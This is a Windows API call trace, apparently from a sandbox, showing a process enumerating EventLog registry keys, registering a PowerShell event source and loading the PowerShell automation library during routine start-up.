	[0320.697] CoTaskMemFree (pv=0x0) 
	[0320.697] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0320.697] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x1, lpName=0x2a92a0, lpcchName=0x1cd088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1cd088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.697] CoTaskMemFree (pv=0x2a92a0) 
	[0320.697] CoTaskMemFree (pv=0x0) 
	[0320.697] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0320.697] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x2, lpName=0x2a92a0, lpcchName=0x1cd088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1cd088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.698] CoTaskMemFree (pv=0x2a92a0) 
	[0320.698] CoTaskMemFree (pv=0x0) 
	[0320.698] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0320.698] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x3, lpName=0x2a92a0, lpcchName=0x1cd088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1cd088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.698] CoTaskMemFree (pv=0x2a92a0) 
	[0320.698] CoTaskMemFree (pv=0x0) 
	[0320.698] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0320.698] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x4, lpName=0x2a92a0, lpcchName=0x1cd088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1cd088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.698] CoTaskMemFree (pv=0x2a92a0) 
	[0320.698] CoTaskMemFree (pv=0x0) 
	[0320.698] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0320.698] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x5, lpName=0x2a92a0, lpcchName=0x1cd088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1cd088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.698] CoTaskMemFree (pv=0x2a92a0) 
	[0320.698] CoTaskMemFree (pv=0x0) 
	[0320.698] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0320.698] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x6, lpName=0x2a92a0, lpcchName=0x1cd088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1cd088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.698] CoTaskMemFree (pv=0x2a92a0) 
	[0320.698] CoTaskMemFree (pv=0x0) 
	[0320.699] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0320.699] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x7, lpName=0x2a92a0, lpcchName=0x1cd088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1cd088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.699] CoTaskMemFree (pv=0x2a92a0) 
	[0320.699] CoTaskMemFree (pv=0x0) 
	[0320.699] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0320.699] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x8, lpName=0x2a92a0, lpcchName=0x1cd088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1cd088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.699] CoTaskMemFree (pv=0x2a92a0) 
	[0320.699] CoTaskMemFree (pv=0x0) 
	[0320.699] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0e8 | out: phkResult=0x1cd0e8*=0x358) returned 0x0
	[0320.699] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0e8 | out: phkResult=0x1cd0e8*=0x0) returned 0x2
	[0320.699] RegOpenKeyExW (in: hKey=0x354, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0e8 | out: phkResult=0x1cd0e8*=0x35c) returned 0x0
	[0320.699] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0e8 | out: phkResult=0x1cd0e8*=0x0) returned 0x2
	[0320.699] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0e8 | out: phkResult=0x1cd0e8*=0x360) returned 0x0
	[0320.700] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0e8 | out: phkResult=0x1cd0e8*=0x0) returned 0x2
	[0320.700] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0e8 | out: phkResult=0x1cd0e8*=0x364) returned 0x0
	[0320.700] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0e8 | out: phkResult=0x1cd0e8*=0x0) returned 0x2
	[0320.700] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0e8 | out: phkResult=0x1cd0e8*=0x368) returned 0x0
	[0320.700] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0e8 | out: phkResult=0x1cd0e8*=0x0) returned 0x2
	[0320.700] RegOpenKeyExW (in: hKey=0x354, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0e8 | out: phkResult=0x1cd0e8*=0x36c) returned 0x0
	[0320.700] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0e8 | out: phkResult=0x1cd0e8*=0x0) returned 0x2
	[0320.700] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0e8 | out: phkResult=0x1cd0e8*=0x370) returned 0x0
	[0320.700] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0e8 | out: phkResult=0x1cd0e8*=0x0) returned 0x2
	[0320.701] RegOpenKeyExW (in: hKey=0x354, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0e8 | out: phkResult=0x1cd0e8*=0x374) returned 0x0
	[0320.701] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0e8 | out: phkResult=0x1cd0e8*=0x0) returned 0x2
	[0320.701] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0e8 | out: phkResult=0x1cd0e8*=0x378) returned 0x0
	[0320.701] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0e8 | out: phkResult=0x1cd0e8*=0x37c) returned 0x0
	[0320.701] RegCloseKey (hKey=0x37c) returned 0x0
	[0320.701] RegCloseKey (hKey=0x354) returned 0x0
	[0320.702] RegCloseKey (hKey=0x378) returned 0x0
	[0320.702] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd088 | out: phkResult=0x1cd088*=0x378) returned 0x0
	[0320.703] RegQueryInfoKeyW (in: hKey=0x378, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ccffc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ccff8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ccffc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ccff8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.703] CoTaskMemFree (pv=0x0) 
	[0320.703] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0320.703] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x0, lpName=0x2a92a0, lpcchName=0x1cd088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1cd088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.703] CoTaskMemFree (pv=0x2a92a0) 
	[0320.703] CoTaskMemFree (pv=0x0) 
	[0320.703] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0320.703] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x1, lpName=0x2a92a0, lpcchName=0x1cd088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1cd088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.703] CoTaskMemFree (pv=0x2a92a0) 
	[0320.703] CoTaskMemFree (pv=0x0) 
	[0320.703] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0320.703] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x2, lpName=0x2a92a0, lpcchName=0x1cd088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1cd088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.703] CoTaskMemFree (pv=0x2a92a0) 
	[0320.703] CoTaskMemFree (pv=0x0) 
	[0320.703] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0320.703] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x3, lpName=0x2a92a0, lpcchName=0x1cd088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1cd088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.703] CoTaskMemFree (pv=0x2a92a0) 
	[0320.704] CoTaskMemFree (pv=0x0) 
	[0320.704] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0320.704] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x4, lpName=0x2a92a0, lpcchName=0x1cd088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1cd088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.704] CoTaskMemFree (pv=0x2a92a0) 
	[0320.704] CoTaskMemFree (pv=0x0) 
	[0320.704] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0320.704] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x5, lpName=0x2a92a0, lpcchName=0x1cd088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1cd088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.704] CoTaskMemFree (pv=0x2a92a0) 
	[0320.704] CoTaskMemFree (pv=0x0) 
	[0320.704] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0320.704] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x6, lpName=0x2a92a0, lpcchName=0x1cd088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1cd088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.704] CoTaskMemFree (pv=0x2a92a0) 
	[0320.704] CoTaskMemFree (pv=0x0) 
	[0320.704] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0320.704] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x7, lpName=0x2a92a0, lpcchName=0x1cd088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1cd088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.704] CoTaskMemFree (pv=0x2a92a0) 
	[0320.704] CoTaskMemFree (pv=0x0) 
	[0320.705] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0320.705] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x8, lpName=0x2a92a0, lpcchName=0x1cd088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1cd088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.705] CoTaskMemFree (pv=0x2a92a0) 
	[0320.705] CoTaskMemFree (pv=0x0) 
	[0320.705] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0e8 | out: phkResult=0x1cd0e8*=0x354) returned 0x0
	[0320.705] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0e8 | out: phkResult=0x1cd0e8*=0x0) returned 0x2
	[0320.705] RegOpenKeyExW (in: hKey=0x378, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0e8 | out: phkResult=0x1cd0e8*=0x37c) returned 0x0
	[0320.705] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0e8 | out: phkResult=0x1cd0e8*=0x0) returned 0x2
	[0320.705] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0e8 | out: phkResult=0x1cd0e8*=0x380) returned 0x0
	[0320.705] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0e8 | out: phkResult=0x1cd0e8*=0x0) returned 0x2
	[0320.705] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0e8 | out: phkResult=0x1cd0e8*=0x384) returned 0x0
	[0320.706] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0e8 | out: phkResult=0x1cd0e8*=0x0) returned 0x2
	[0320.706] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0e8 | out: phkResult=0x1cd0e8*=0x388) returned 0x0
	[0320.706] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0e8 | out: phkResult=0x1cd0e8*=0x0) returned 0x2
	[0320.706] RegOpenKeyExW (in: hKey=0x378, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0e8 | out: phkResult=0x1cd0e8*=0x38c) returned 0x0
	[0320.706] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0e8 | out: phkResult=0x1cd0e8*=0x0) returned 0x2
	[0320.706] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0e8 | out: phkResult=0x1cd0e8*=0x390) returned 0x0
	[0320.706] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0e8 | out: phkResult=0x1cd0e8*=0x0) returned 0x2
	[0320.706] RegOpenKeyExW (in: hKey=0x378, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0e8 | out: phkResult=0x1cd0e8*=0x394) returned 0x0
	[0320.706] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0e8 | out: phkResult=0x1cd0e8*=0x0) returned 0x2
	[0320.707] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0e8 | out: phkResult=0x1cd0e8*=0x398) returned 0x0
	[0320.707] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0e8 | out: phkResult=0x1cd0e8*=0x39c) returned 0x0
	[0320.707] RegCloseKey (hKey=0x39c) returned 0x0
	[0320.707] RegCloseKey (hKey=0x378) returned 0x0
	[0320.707] RegCloseKey (hKey=0x398) returned 0x0
	[0321.190] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd058 | out: phkResult=0x1cd058*=0x398) returned 0x0
	[0321.190] RegQueryInfoKeyW (in: hKey=0x398, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ccfcc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ccfc8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ccfcc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ccfc8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0321.190] CoTaskMemFree (pv=0x0) 
	[0321.190] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0321.190] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x0, lpName=0x2a92a0, lpcchName=0x1cd058, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1cd058, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0321.191] CoTaskMemFree (pv=0x2a92a0) 
	[0321.191] CoTaskMemFree (pv=0x0) 
	[0321.191] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0321.191] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x1, lpName=0x2a92a0, lpcchName=0x1cd058, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1cd058, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0321.191] CoTaskMemFree (pv=0x2a92a0) 
	[0321.191] CoTaskMemFree (pv=0x0) 
	[0321.191] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0321.191] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x2, lpName=0x2a92a0, lpcchName=0x1cd058, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1cd058, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0321.191] CoTaskMemFree (pv=0x2a92a0) 
	[0321.191] CoTaskMemFree (pv=0x0) 
	[0321.191] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0321.191] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x3, lpName=0x2a92a0, lpcchName=0x1cd058, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1cd058, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0321.191] CoTaskMemFree (pv=0x2a92a0) 
	[0321.191] CoTaskMemFree (pv=0x0) 
	[0321.191] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0321.191] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x4, lpName=0x2a92a0, lpcchName=0x1cd058, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1cd058, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0321.191] CoTaskMemFree (pv=0x2a92a0) 
	[0321.191] CoTaskMemFree (pv=0x0) 
	[0321.191] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0321.191] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x5, lpName=0x2a92a0, lpcchName=0x1cd058, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1cd058, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0321.191] CoTaskMemFree (pv=0x2a92a0) 
	[0321.191] CoTaskMemFree (pv=0x0) 
	[0321.191] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0321.191] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x6, lpName=0x2a92a0, lpcchName=0x1cd058, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1cd058, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0321.192] CoTaskMemFree (pv=0x2a92a0) 
	[0321.192] CoTaskMemFree (pv=0x0) 
	[0321.192] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0321.192] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x7, lpName=0x2a92a0, lpcchName=0x1cd058, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1cd058, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0321.192] CoTaskMemFree (pv=0x2a92a0) 
	[0321.192] CoTaskMemFree (pv=0x0) 
	[0321.192] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0321.192] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x8, lpName=0x2a92a0, lpcchName=0x1cd058, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1cd058, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0321.192] CoTaskMemFree (pv=0x2a92a0) 
	[0321.192] CoTaskMemFree (pv=0x0) 
	[0321.192] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0b8 | out: phkResult=0x1cd0b8*=0x378) returned 0x0
	[0321.192] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0b8 | out: phkResult=0x1cd0b8*=0x0) returned 0x2
	[0321.192] RegOpenKeyExW (in: hKey=0x398, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0b8 | out: phkResult=0x1cd0b8*=0x39c) returned 0x0
	[0321.192] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0b8 | out: phkResult=0x1cd0b8*=0x0) returned 0x2
	[0321.192] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0b8 | out: phkResult=0x1cd0b8*=0x3a0) returned 0x0
	[0321.192] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0b8 | out: phkResult=0x1cd0b8*=0x0) returned 0x2
	[0321.192] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0b8 | out: phkResult=0x1cd0b8*=0x3a4) returned 0x0
	[0321.193] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0b8 | out: phkResult=0x1cd0b8*=0x0) returned 0x2
	[0321.193] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0b8 | out: phkResult=0x1cd0b8*=0x3a8) returned 0x0
	[0321.193] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0b8 | out: phkResult=0x1cd0b8*=0x0) returned 0x2
	[0321.193] RegOpenKeyExW (in: hKey=0x398, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0b8 | out: phkResult=0x1cd0b8*=0x3ac) returned 0x0
	[0321.193] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0b8 | out: phkResult=0x1cd0b8*=0x0) returned 0x2
	[0321.193] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0b8 | out: phkResult=0x1cd0b8*=0x3b0) returned 0x0
	[0321.193] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0b8 | out: phkResult=0x1cd0b8*=0x0) returned 0x2
	[0321.193] RegOpenKeyExW (in: hKey=0x398, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0b8 | out: phkResult=0x1cd0b8*=0x3b4) returned 0x0
	[0321.211] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0b8 | out: phkResult=0x1cd0b8*=0x0) returned 0x2
	[0321.211] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0b8 | out: phkResult=0x1cd0b8*=0x394) returned 0x0
	[0321.211] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0b8 | out: phkResult=0x1cd0b8*=0x3b0) returned 0x0
	[0321.212] RegCloseKey (hKey=0x3b0) returned 0x0
	[0321.212] RegCloseKey (hKey=0x398) returned 0x0
	[0321.212] RegCloseKey (hKey=0x394) returned 0x0
	[0321.217] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b960008
	[0321.419] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d599a0*="WSMan", lpRawData=0x2d59710) returned 1
	[0321.424] CoTaskMemAlloc (cb=0x104) returned 0x2a1100
	[0321.424] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0321.425] CoTaskMemFree (pv=0x2a1100) 
	[0321.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.427] CoTaskMemAlloc (cb=0x804) returned 0x1b7434c0
